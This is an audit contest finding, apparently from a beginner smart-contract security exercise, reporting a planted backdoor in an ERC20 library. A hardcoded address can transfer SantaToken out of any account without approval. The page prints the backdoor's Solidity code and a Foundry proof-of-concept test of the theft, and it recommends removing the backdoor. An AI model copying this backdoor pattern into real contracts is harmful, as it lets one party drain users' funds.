First Flight #5: Santa's List

First Flight #5

Beginner FriendlyFoundry

100 EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Backdoor in transferFrom of the ERC20 implementation

n0kto

Summary

The transferFrom function in the ERC20 implementation contains a backdoor that allows a specific address to transfer any SantaToken to another specific address. This backdoor can be exploited by the address 0x815F577F1c1bcE213c012f166744937C889DAF17 to transfer SantaToken from any account to its own address.

Vulnerability Details

The vulnerable code can be found in the transferFrom function of the ERC20 implementation. The code checks if the msg.sender is equal to 0x815F577F1c1bcE213c012f166744937C889DAF17, and if true, it subtracts the specified amount from the from address and adds it to the to address.

Backdoor

function transferFrom(address from, address to, uint256 amount) public virtual returns (bool) {

// hehehe :)

// https://arbiscan.io/tx/0xd0c8688c3bcabd0024c7a52dfd818f8eb656e9e8763d0177237d5beb70a0768d

if (msg.sender == 0x815F577F1c1bcE213c012f166744937C889DAF17) {

balanceOf[from] -= amount;

unchecked {

balanceOf[to] += amount;

}

emit Transfer(from, to, amount);

return true;

}

...

Foundry PoC

function testBackdoorERC20() public {

vm.prank(address(santasList));

santaToken.mint(user);

assertEq(santaToken.balanceOf(user), 1e18);

address pirateBackdoor = 0x815F577F1c1bcE213c012f166744937C889DAF17;

vm.prank(pirateBackdoor);

santaToken.transferFrom(user, pirateBackdoor, 1e18);

assertEq(santaToken.balanceOf(user), 0);

assertEq(santaToken.balanceOf(pirateBackdoor), 1e18);

}

Impact

This vulnerability allows the address 0x815F577F1c1bcE213c012f166744937C889DAF17 to transfer any amount of SantaToken from any account to its own address. This can lead to unauthorized transfers and potential loss of all funds for any users owning SantaTokens.

Tools Used

Manual review

Recommendations

To fix this vulnerability, the backdoor code should be removed from the transferFrom function. Additionally, it is recommended to only use trusted libraries for implementing ERC20 tokens to avoid potential security issues.

Updates

Lead Judging Commences

inallhonesty Lead Judge over 1 year ago

Submission Judgement Published

Validated

Assigned finding tags:

unauthorized elf wallet approval in solmate-bad

Some sneaky elf has changed this library to a corrupted one where his wallet address skips all the approval checks for SantaToken! Shenanigans here - https://github.com/PatrickAlphaC/solmate-bad/blob/c3877e5571461c61293503f45fc00959fff4ebba/src/tokens/ERC20.sol#L88

Rewards breakdown

nSLOC

116

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.